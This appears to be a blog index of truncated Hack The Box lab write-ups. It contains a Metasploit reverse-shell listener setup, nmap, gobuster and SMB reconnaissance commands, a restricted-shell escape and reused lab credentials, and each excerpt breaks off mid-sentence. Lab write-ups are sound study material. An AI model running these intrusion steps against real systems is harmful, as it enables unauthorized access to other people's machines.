Create a Metasploit listener

Steps to create a Metasploit listener:

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > exploit -j
sessions -i 1

(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable

Using Metasploit I've sometimes seen this error:

[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (

To solve it:

List processes listening on port 1234
lsof -i :1234

Kill a process with process ID 5678
kill -9 5678

HTB Devel

$nmap -T4 -sV -p- -A

Open ports detected:
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5

$nikto -h
$nmap -p 80 --script vuln
$nmap -p 21 --script vuln
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

Nothing much useful was found until this point.

$ftp
ftp> dir
ftp> put test.txt
ftp> dir

So, if we can upload any file, can we

HTB Legacy

$sudo nmap -A -T4 -p-

Open ports detected:
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server

Based on the detected ports, we have SMB here.

$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > run

Which SMB version do we have? Not sure yet...

$nmap -p139 --script smb-protocols -Pn
$nmap -p445 --script smb-protocols -Pn

According to

HTB Lame

$nmap -T4 -p- -A -Pn

Open ports detected:
21/tcp   open  ftp          vsftpd 2.3.4
22/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd      distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

$ftp
No files are detected.

$ssh

$msfconsole

Install Searchsploit
$sudo apt update && sudo apt -y install exploitdb
$searchsploit

HTB Starting Point – Base

$./

Ports detected:
22/tcp open  ssh  OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http Apache httpd 2.4.29 ((Ubuntu))

$gobuster dir -u -w /usr/share/wordlists/dirb/big.txt

Interesting items found: /_uploaded and /login

Access to
The login folder can be listed (due to a misconfiguration of the web server).

Foothold
Download all three files to analyze them. login.php.swp is a binary file.

$ls -la
$file login.php.swp

As it is described, login.php.swp

HTB Starting Point – Guard

$./

The SSH port is open. Let's try the last SSH user we obtained.

$ssh -i id_rsa daniel@

The SSH login gives us access to a restricted shell, where commands like find, cat and python are disabled. We are unable to read user.txt from this shell.

The man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a

HTB Starting Point – Markup

$./

Open ports:
22/tcp  open  ssh       OpenSSH for_Windows_8.1 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
443/tcp open  ssl/http  Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)

$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

The Apache service is running. Let's try to access the site.

Access to

In the previous machine, we found credentials stored in an SQL dump. Let's try to reuse them to log into the application. The

HTB Starting Point – Included

$./

Open ports detected:
80/tcp open  http   Apache httpd 2.4.29 ((Ubuntu))

Access to: redirection to

Use OWASP ZAP to scan this site:

This machine is vulnerable to a File Inclusion / Path Traversal attack. According to the application description: The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a

HTB Starting Point – Pathfinder

$./

Open ports detected:

WinRM 2.0 (Microsoft Windows Remote Management) uses port 5985/tcp for HTTP and 5986/tcp for HTTPS by default.

Using the credentials we obtained in a previous machine, sandra:Password1234!, we can attempt to enumerate Active Directory. We can achieve this using BloodHound. There is a Python BloodHound ingester, which can be found here.

We can attempt to enumerate Active Directory. Try using old machine credentials... BloodHound is a single